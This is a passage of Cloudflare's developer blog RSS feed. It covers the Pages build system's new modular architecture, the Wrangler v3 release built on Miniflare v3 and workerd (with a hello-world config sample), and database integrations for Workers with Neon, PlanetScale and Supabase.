            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/265Kkauu3hg7i7PgW6l9IC/ac785539cffcfd46c52ca0e01b70b306/image5-5.png" />
            
            </figure><p>Additionally, we're now making your builds more reproducible by taking advantage of lockfiles with many package managers. <code>npm ci</code> and <code>yarn --pure-lockfile</code> are now used ahead of your build command in this new version of the build system.</p><p>For new projects, these updated defaults and added support for pnpm and Yarn 3 mean that more projects will just work immediately without any undue setup, tweaking, or configuration. Today, we're launching this update as a beta, but we will be quickly promoting it to general availability once we're satisfied with its stability. Once it does graduate, new projects will use this updated build system by default.</p><p>We know that this update has been a long-standing request from our users (we thank you for your patience!) but part of this rollout is ensuring that we are now in a better position to make regular updates to Cloudflare Pages' build system. You can expect these default languages and tools to now keep pace with the rapid rate of change seen in the world of web development.</p><p>We very much welcome your continued feedback as we know that new tools can quickly appear on the scene, and old ones can just as quickly drop off. As ever, our <a href="https://discord.com/invite/cloudflaredev">Discord server</a> is the best place to engage with the community and Pages team. We’re excited to hear your thoughts and suggestions.</p>
    <div>
      <h2>Our modular and scalable architecture</h2>
      <a href="#our-modular-and-scalable-architecture">
        
      </a>
    </div>
    <p>Powering this updated build system is a new architecture that we've been working on behind-the-scenes. <a href="/cloudflare-pages-build-improvements/">We're no strangers to sweeping changes of our build infrastructure</a>: we've done a lot of work to grow and scale our infrastructure. Moving beyond purely <a href="https://www.cloudflare.com/developer-platform/solutions/hosting/">static site hosting</a> with <a href="/cloudflare-pages-goes-full-stack/">Pages Functions</a> brought a new wave of users, and as we explore <a href="/pages-and-workers-are-converging-into-one-experience">convergence</a> with Workers, we expect even more developers to rely on our git integrations and CI builds. Our new architecture is being rolled out without any changes affecting users, so unless you're interested in the technical nitty-gritty, feel free to stop reading!</p><p>The biggest change we're making with our architecture is its modularity. Previously, we were using Kubernetes to run a monolithic container which was responsible for everything for the build. Within the same image, we'd stream our build logs, clone the git repository, install any custom versions of languages and tools, install a project's dependencies, run the user's build command, and upload all the assets of the build. This was a lot of work for one container! It meant that our system tooling had to be compatible with versions in the user's space and therefore new default versions were a massive change to make. This is a big part of why it took us so long to be able to update the build system for our users.</p><p>In the new architecture, we've broken these steps down into multiple separate containers. We make use of <a href="https://kubernetes.io/docs/concepts/workloads/pods/init-containers/">Kubernetes' init containers feature</a> and instead of one monolithic container, we have three that execute sequentially:</p><ol><li><p>clone a user's git repository,</p></li><li><p>install any custom versions of languages and tools, install a project's dependencies, run the user's build command, and</p></li><li><p>upload all the assets of a build.</p></li></ol><p>We use a <a href="https://kubernetes.io/docs/tasks/access-application-cluster/communicate-containers-same-pod-shared-volume/">shared volume</a> to give the build a persistent workspace to use between containers, but now there is clear isolation between <b>system</b> stages (cloning a repository and uploading assets) and <b>user</b> stages (running code that the user is responsible for). We no longer need to worry about conflicting versions, and we've created an additional layer of security by isolating a user's control to a separate environment.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/11McSSl7sZWok1UdR8EuRV/35bb07d37152065d5870c24813ac8d73/1-6.png" />
            
            </figure><p>We're also aligning the final stage, the one responsible for uploading static assets, with the same APIs that Wrangler uses for Direct Upload projects. This reduces our maintenance burden going forward since we'll only need to consider one way of uploading assets and creating deployments. As we consolidate, we're exploring ways to make these APIs even faster and more reliable.</p>
    <div>
      <h3>Logging out</h3>
      <a href="#logging-out">
        
      </a>
    </div>
    <p>You might have noticed that we haven't yet talked about how we're continuing to stream build logs. Arguably, this was one of the most challenging pieces to work out. When everything ran in a single container, we were able to simply latch directly into the <code>stdout</code> of our various stages and pipe them through to a Durable Object which could communicate with the Cloudflare dashboard.</p><p>By introducing this new isolation between containers, we had to get a bit more inventive. After prototyping a number of approaches, we've found one that we like. We run a separate, global log collector container inside Kubernetes which is responsible for collating logs from a build, and passing them through to that same Durable Object infrastructure. The one caveat is that the logs now need to be annotated with which build they are coming from, since one global log collector container accepts logs from multiple builds. A Worker in front of the Durable Object is responsible for reading the annotation and delegating to the relevant build's Durable Object instance.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6liD6t03jOlyaUug44A7gQ/9e6fec6d6b8864b187353872d9744cd4/image1-40.png" />
            
            </figure>
    <div>
      <h3>Caching in</h3>
      <a href="#caching-in">
        
      </a>
    </div>
    <p>With this new modular architecture, we plan to integrate a feature we've been teasing for a while: build caching. Today, when you run a build in Cloudflare Pages, we start fresh every time. This works, but it's inefficient.</p><p>Very often, only small changes are actually made to your website between deployments: you might tweak some text on your homepage, or add a new blog post; but rarely does the core foundation of your site actually change between deployments. With build caching, we can reuse some of the work from earlier builds to speed up subsequent builds. We'll offer a best-effort storage mechanism that allows you to persist and restore files between builds. You'll soon be able to cache dependencies, as well as the build output itself if your framework supports it, resulting in considerably faster builds and a tighter feedback loop from push to deploy.</p><p>This is possible because our new modular design has clear divides between the stages where we'd want to restore and cache files.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/YcQdgswXh6aueVEkJkBGK/020e5a74f78b9c8a961cda57c623c69c/2-3.png" />
            
            </figure>
    <div>
      <h2>Start building</h2>
      <a href="#start-building">
        
      </a>
    </div>
    <p>We're excited about the improvements that this new modular architecture will afford the Pages team, but we're even more excited for how this will result in faster and more scalable builds for our users. This architecture transition is rolling out behind-the-scenes, but <b>the updated beta build system with new languages and tools is available to try today</b>. Navigate to your Pages project settings in the Cloudflare Dashboard to opt-in.</p><p>Let us know if you have any feedback on the <a href="https://discord.com/invite/cloudflaredev">Discord server</a>, and stay tuned for more information about build caching in upcoming posts on this blog. Later today (Wednesday 17th, 2023), the Pages team will be hosting a <a href="https://discord.com/invite/cloudflaredev?event=1103324690149298196">Q&amp;A session</a> to talk about this announcement on Discord at 17:30 UTC.</p> ]]></content:encoded>
            <category><![CDATA[Developer Week]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Cloudflare Pages]]></category>
            <category><![CDATA[Serverless]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <guid isPermaLink="false">3CewNJiFa5g7gsagtQab5V</guid>
            <dc:creator>Greg Brimble</dc:creator>
        </item>
        <item>
            <title><![CDATA[Improved local development with wrangler and workerd]]></title>
            <link>https://blog.cloudflare.com/wrangler3/</link>
            <pubDate>Wed, 17 May 2023 13:00:15 GMT</pubDate>
            <description><![CDATA[ We’re proud to announce the release of Wrangler v3 – the first version of Wrangler with local-by-default development, powered by Miniflare v3 and the open-source Workers `workerd` runtime. ]]></description>
            <content:encoded><![CDATA[ 
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3iSHHNyNYsb21AEw80h3lW/953b982411c18fcb0721afc8dd83ac7e/image5-7.png" />
            
            </figure><p>For over a year now, we’ve been working to improve the Workers local development experience. Our goal has been to improve parity between users' local and production environments. This is important because it provides developers with a fully-controllable and easy-to-debug local testing environment, which leads to increased developer efficiency and confidence.</p><p>To start, we integrated <a href="https://github.com/cloudflare/miniflare">Miniflare</a>, a fully-local simulator for Workers, directly <a href="/miniflare/">into Wrangler</a>, the Workers CLI. This allowed users to develop locally with Wrangler by running <code>wrangler dev --local</code>. Compared to the <code>wrangler dev</code> default, which relied on remote resources, this represented a significant step forward in local development. As good as it was, it couldn’t leverage the actual Workers runtime, which led to some inconsistencies and behavior mismatches.</p><p>Last November, we <a href="/miniflare-and-workerd/">announced the experimental version of Miniflare v3,</a> powered by the newly open-sourced <a href="https://github.com/cloudflare/workerd"><code>workerd</code> runtime</a>, the same runtime used by Cloudflare Workers. Since then, we’ve continued to improve upon that experience both in terms of accuracy with the real runtime and in cross-platform compatibility.</p><p>As a result of all this work, we are proud to announce the release of Wrangler v3 – the first version of Wrangler with local-by-default development.</p>
    <div>
      <h2>A new default for Wrangler</h2>
      <a href="#a-new-default-for-wrangler">
        
      </a>
    </div>
    <p>Starting with Wrangler v3, users running <code>wrangler dev</code> will be leveraging Miniflare v3 to run your Worker locally. This local development environment is effectively as accurate as a production Workers environment, providing an ability for you to test every aspect of your application before deploying. It provides the same runtime and bindings, but has its own simulators for KV, R2, D1, Cache and Queues. Because you’re running everything on your machine, you won’t be billed for operations on KV namespaces or R2 buckets during development, and you can try out paid-features like Durable Objects for free.</p><p>In addition to a more accurate developer experience, you should notice performance differences. Compared to remote mode, we’re seeing a 10x reduction to startup times and 60x reduction to script reload times with the new local-first implementation. This massive reduction in reload times drastically improves developer velocity!</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3iwuiO3yvOuQQLFa9DbQZU/21379c38d9ce9a73e0f7a1c6eb8fbfb4/image4-12.png" />
            
            </figure><p>Remote development isn’t going anywhere. We recognise many developers still prefer to test against real data, or want to test Cloudflare services like <a href="https://developers.cloudflare.com/images/image-resizing/resize-with-workers">image resizing</a> that aren’t implemented locally yet. To run <code>wrangler dev</code> on Cloudflare’s network, just like previous versions, use the new <code>--remote</code> flag.</p>
    <div>
      <h2>Deprecating Miniflare v2</h2>
      <a href="#deprecating-miniflare-v2">
        
      </a>
    </div>
    <p>For users of Miniflare, there are two important pieces of information for those updating from v2 to v3. First, if you’ve been using Miniflare’s CLI directly, you’ll need to switch to <code>wrangler dev</code>. Miniflare v3 no longer includes a CLI. Secondly, if you’re using Miniflare’s API directly, upgrade to <code>miniflare@3</code> and follow the <a href="https://miniflare.dev/get-started/migrating">migration guide</a>.</p>
    <div>
      <h2>How we built Miniflare v3</h2>
      <a href="#how-we-built-miniflare-v3">
        
      </a>
    </div>
    <p>Miniflare v3 is now built using <code>workerd</code>, the open-source Cloudflare Workers runtime. As <code>workerd</code> is a server-first runtime, every configuration defines at least one socket to listen on. Each socket is configured with a service, which can be an external server, disk directory or most importantly for us, a Worker! To start a <code>workerd</code> server running a Worker, create a <code>worker.capnp</code> file as shown below, run <code>npx workerd serve worker.capnp</code> and visit <a href="http://localhost:8080">http://localhost:8080</a> in your browser:</p>
            <pre><code>using Workerd = import "/workerd/workerd.capnp";


const helloConfig :Workerd.Config = (
 services = [
   ( name = "hello-worker", worker = .helloWorker )
 ],
 sockets = [
   ( name = "hello-socket", address = "*:8080", http = (), service = "hello-worker" )
 ]
);


const helloWorker :Workerd.Worker = (
 modules = [
   ( name = "worker.mjs",
     esModule =
       `export default {
       `  async fetch(request, env, ctx) {
       `    return new Response("Hello from workerd! 👋");
       `  }
       `}
   )
 ],
 compatibilityDate = "2023-04-04",
);</code></pre>
            <p>If you’re interested in what else <code>workerd</code> can do, check out the <a href="https://github.com/cloudflare/workerd/tree/main/samples">other samples</a>. Whilst <code>workerd</code> provides the runtime and bindings, it doesn’t provide the underlying implementations for the other products in the Developer Platform. This is where Miniflare comes in! It provides simulators for KV, R2, D1, Queues and the Cache API.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/44vdcPO7sdaTtBi0u0HMgE/85e6510a0f8689284add4318e09c4c2c/image1-43.png" />
            
            </figure>
    <div>
      <h3>Building a flexible storage system</h3>
      <a href="#building-a-flexible-storage-system">
        
      </a>
    </div>
    <p>As you can see from the diagram above, most of Miniflare’s job is now providing different interfaces for data storage. In Miniflare v2, we used a custom key-value store to back these, but this had <a href="https://github.com/cloudflare/miniflare/issues/167">a</a> <a href="https://github.com/cloudflare/miniflare/issues/247">few</a> <a href="https://github.com/cloudflare/miniflare/issues/530">limitations</a>. For Miniflare v3, we’re now using the industry-standard <a href="https://sqlite.org/index.html">SQLite</a>, with a separate blob store for KV values, R2 objects, and cached responses. Using SQLite gives us much more flexibility in the queries we can run, allowing us to support future unreleased storage solutions. 👀</p><p>A separate blob store allows us to provide efficient, ranged, <a href="https://streams.spec.whatwg.org/#example-rbs-pull">streamed access</a> to data. Blobs have unguessable identifiers, can be deleted, but are otherwise immutable. These properties make it possible to perform atomic updates with the SQLite database. No other operations can interact with the blob until it's committed to SQLite, because the ID is not guessable, and we don't allow listing blobs. For more details on the rationale behind this, check out the <a href="https://github.com/cloudflare/miniflare/discussions/525">original GitHub discussion</a>.</p>
    <div>
      <h3>Running unit tests inside Workers</h3>
      <a href="#running-unit-tests-inside-workers">
        
      </a>
    </div>
    <p>One of Miniflare’s primary goals is to provide a great local testing experience. Miniflare v2 provided <a href="https://miniflare.dev/testing/vitest">custom environments</a> for popular Node.js testing frameworks that allowed you to run your tests <i>inside</i> the Miniflare sandbox. This meant you could import and call any function using Workers runtime APIs in your tests. You weren’t restricted to integration tests that just send and receive HTTP requests. In addition, these environments provide per-test isolated storage, automatically undoing any changes made at the end of each test.</p><p>In Miniflare v2, these environments were relatively simple to implement. We’d already reimplemented Workers Runtime APIs in a Node.js environment, and could inject them using Jest and Vitest’s APIs into the global scope.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6UrAr6zl1SsIbG2Qyvq1p2/40113914d049e7ad928c16373dab7fa7/image3-13.png" />
            
            </figure><p>For Miniflare v3, this is much trickier. The runtime APIs are implemented in a separate <code>workerd</code> process, and you can’t reference JavaScript classes across a process boundary. So we needed a new approach…</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/44s7Z0ZD3r5hQpdCxr1atZ/8b1d395872b13a1123cf77e25ab07533/image7-7.png" />
            
            </figure><p>Many test frameworks like Vitest use Node’s built-in <a href="https://nodejs.org/api/worker_threads.html"><code>worker_threads</code></a> module for running tests in parallel. This module spawns new operating system threads running Node.js and provides a <code>MessageChannel</code> interface for communicating between them. What if instead of spawning a new OS thread, we spawned a new <code>workerd</code> process, and used WebSockets for communication between the Node.js host process and the <code>workerd</code> “thread”?</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5jGThLJfIpVq47I9KaxaS3/86a1ff8b9739f21e6629eb8f8b793ffa/image8-8.png" />
            
            </figure><p>We have a proof of concept using Vitest showing this approach can work in practice. Existing Vitest IDE integrations and the Vitest UI continue to work without any additional work. We aren’t quite ready to release this yet, but will be working on improving it over the next few months. Importantly, the <code>workerd</code> “thread” needs access to Node.js built-in modules, which we recently started <a href="/workers-node-js-asynclocalstorage/">rolling out support for</a>.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/HqXRYKmlaionjMJK7PW6i/974cb97c5b694db5c3f567f628d861ed/image2-23.png" />
            
            </figure>
    <div>
      <h3>Running on every platform</h3>
      <a href="#running-on-every-platform">
        
      </a>
    </div>
    <p>We want developers to have this great local testing experience, regardless of which operating system they’re using. Before open-sourcing, the Cloudflare Workers runtime was originally only designed to run on Linux. For Miniflare v3, we needed to add support for macOS and Windows too. macOS and Linux are both Unix-based, making porting between them relatively straightforward. Windows on the other hand is an entirely different beast… 😬</p><p>The <code>workerd</code> runtime uses <a href="https://github.com/capnproto/capnproto/tree/master/c%2B%2B/src/kj">KJ</a>, an alternative C++ base library, which is already cross-platform. We’d also migrated to the <a href="https://bazel.build/">Bazel</a> build system in preparation for open-sourcing the runtime, which has good Windows support. When compiling our C++ code for Windows, we use LLVM's MSVC-compatible compiler driver <a href="https://llvm.org/devmtg/2014-04/PDFs/Talks/clang-cl.pdf"><code>clang-cl</code></a>, as opposed to using Microsoft’s Visual C++ compiler directly. This enables us to use the "same" compiler frontend on Linux, macOS, and Windows, massively reducing the effort required to compile <code>workerd</code> on Windows. Notably, this provides proper support for <code>#pragma once</code> when using symlinked virtual includes produced by Bazel, <code>__atomic_*</code> functions, a standards-compliant preprocessor, GNU statement expressions used by some KJ macros, and understanding of the <code>.c++</code> extension by default. After switching out <a href="https://github.com/mrbbot/workerd/blob/5e10e308e6683f8f88833478801c07da4fe01063/src/workerd/server/workerd.c%2B%2B#L802-L808">unix API calls for their Windows equivalents</a> using <code>#if _WIN32</code> preprocessor directives, and fixing a bunch of segmentation faults caused by execution order differences, we were finally able to get <code>workerd</code> running on Windows! No WSL or Docker required! 🎉</p>
    <div>
      <h2>Let us know what you think!</h2>
      <a href="#let-us-know-what-you-think">
        
      </a>
    </div>
    <p>Wrangler v3 is now generally available! Upgrade by running <code>npm install --save-dev wrangler@3</code> in your project. Then run <code>npx wrangler dev</code> to try out the new local development experience powered by Miniflare v3 and the open-source Workers runtime. Let us know what you think in the <code>#wrangler</code> channel on the <a href="https://discord.com/invite/cloudflaredev">Cloudflare Developers Discord</a>, and please <a href="https://github.com/cloudflare/workers-sdk/issues/new/choose">open a GitHub issue</a> if you hit any unexpected behavior.</p> ]]></content:encoded>
            <category><![CDATA[Developer Week]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Serverless]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Wrangler]]></category>
            <category><![CDATA[Miniflare]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <guid isPermaLink="false">6XGVmk1ZbylTfVULuFs2jk</guid>
            <dc:creator>Brendan Coll</dc:creator>
            <dc:creator>Adam Murray</dc:creator>
        </item>
        <item>
            <title><![CDATA[Announcing database integrations: a few clicks to connect to Neon, PlanetScale and Supabase on Workers]]></title>
            <link>https://blog.cloudflare.com/announcing-database-integrations/</link>
            <pubDate>Tue, 16 May 2023 13:05:00 GMT</pubDate>
            <description><![CDATA[ Today we’re announcing Database Integrations  – making it seamless to connect to your database of choice on Workers.  ]]></description>
            <content:encoded><![CDATA[ <p></p><p><i>This blog post references a feature which has updated documentation. For the latest reference content, visit </i><a href="https://developers.cloudflare.com/workers/databases/third-party-integrations/"><i>https://developers.cloudflare.com/workers/databases/third-party-integrations/</i></a></p><p>One of the best feelings as a developer is seeing your idea come to life. You want to move fast and Cloudflare’s developer platform gives you the tools to take your applications from 0 to 100 within minutes.</p><p>One thing that we’ve heard slows developers down is the question: <i>“What databases can be used with Workers?”</i>. Developers stumble when it comes to things like finding the databases that Workers can connect to, the right library or driver that's compatible with Workers and translating boilerplate examples to something that can run on our developer platform.</p><p>Today we’re announcing Database Integrations  – making it seamless to connect to your database of choice on Workers. To start, we’ve added some of the most popular databases that support HTTP connections: <a href="https://neon.tech/">Neon</a>, <a href="https://planetscale.com/">PlanetScale</a> and <a href="https://supabase.com/">Supabase</a> with more (like Prisma, Fauna, MongoDB Atlas) to come!</p>
    <div>
      <h2>Focus more on code, less on config</h2>
      <a href="#focus-more-on-code-less-on-config">
        
      </a>
    </div>
    <p>Our <a href="https://www.cloudflare.com/developer-platform/products/d1/">serverless SQL database</a>, D1, launched in open alpha last year, and we’re continuing to invest in making it production ready (stay tuned for an exciting update later this week!). We also recognize that there are plenty of flavours of databases, and we want developers to have the freedom to select what’s best for them and pair it with our powerful compute offering.</p><p>On our second day of this Developer Week 2023, data is in the spotlight. We’re taking huge strides in making it possible and more performant to connect to databases from Workers (spoiler alert!):</p><ul><li><p><a href="/workers-tcp-socket-api-connect-databases">Announcing connect() — a new API for creating TCP sockets from Cloudflare Workers</a></p></li><li><p><a href="/announcing-database-integrations">Smart Placement speeds up applications by moving code close to your backend — no config needed</a></p></li></ul><p>Making it possible and performant is just the start, we also want to make connecting to databases painless. Databases have specific protocols, drivers, APIs and vendor specific features that you need to understand in order to get up and running. With Database Integrations, we want to make this process foolproof.</p><p>Whether you’re working on your first project or your hundredth project, you should be able to connect to your database of choice with your eyes closed. With Database Integrations, you can spend less time focusing on configuration and more on doing what you love – building your applications!</p>
    <div>
      <h2>What does this experience look like?</h2>
      <a href="#what-does-this-experience-look-like">
        
      </a>
    </div>
    
    <div>
      <h3>Discoverability</h3>
      <a href="#discoverability">
        
      </a>
    </div>
    <p>If you’re starting a project from scratch or want to connect Workers to an existing database, you want to know <i>“What are my options?”</i>.</p><p>Workers supports connections to a wide array of database providers over HTTP.  With newly released <a href="/workers-tcp-socket-api-connect-databases">outbound TCP support</a>, the databases that you can connect to on Workers will only grow!</p><p>In the new “Integrations” tab, you’ll be able to view all the databases that we support and add the integration to your Worker directly from here. To start, we have support for Neon, PlanetScale and Supabase with many more coming soon.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/72AInQBXAsWNkEcBr3DPeo/3c546a2d7e2cfdf403ffac91154f172a/image2-10.png" />
            
            </figure>
    <div>
      <h3>Authentication</h3>
      <a href="#authentication">
        
      </a>
    </div>
    <p>You should never have to copy and paste your database credentials or other parts of the connection string.</p><p>Once you hit “Add Integration” we take you through an OAuth2 flow that automatically gets the right configuration from your database provider and adds them as encrypted environment variables to your Worker.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4DKr9USRBKD90foCkyPkLM/b9bedf4c535ed33c1b42bdc176f066c3/integration-flow.png" />
            
            </figure><p>Once you have credentials set up, check out our <a href="https://developers.cloudflare.com/workers/learning/integrations/databases/#native-database-integrations-beta">documentation</a> for examples on how to get started using the data platform’s client library. What’s more – we have templates coming that will allow you to get started even faster!</p><p>That’s it! With database integrations, you can connect your Worker with your database in just a few clicks. Head to your Worker &gt; Settings &gt; Integrations to try it out today.</p>
    <div>
      <h2>What’s next?</h2>
      <a href="#whats-next">
        
      </a>
    </div>
    <p>We’ve only just scratched the surface with Database Integrations and there’s a ton more coming soon!</p><p>While we’ll be continuing to add support for more popular data platforms we also know that it's impossible for us to keep up in a moving landscape. We’ve been working on an integrations platform so that any database provider can easily build their own integration with Workers. As a developer, this means that you can start tinkering with the next new database right away on Workers.</p><p>Additionally, we’re working on adding wrangler support, so you can create integrations directly from the CLI. We’ll also be adding support for account level environment variables in order for you to share integrations across the Workers in your account.</p><p>We’re really excited about the potential here and to see all the new creations from our developers! Be sure to join <a href="https://discord.gg/cloudflaredev">Cloudflare’s Developer Discord</a> and share your projects. Happy building!</p> ]]></content:encoded>
            <category><![CDATA[Developer Week]]></category>
            <category><![CDATA[Latin America]]></category>
            <category><![CDATA[SASE]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Serverless]]></category>
            <category><![CDATA[Database]]></category>
            <category><![CDATA[Internet Performance]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Connectivity Cloud]]></category>
            <guid isPermaLink="false">bAEI0IEwgtOSNAWKw64Zl</guid>
            <dc:creator>Shaun Persad</dc:creator>
            <dc:creator>Emily Chen</dc:creator>
            <dc:creator>Tanushree Sharma</dc:creator>
        </item>
    </channel>
</rss>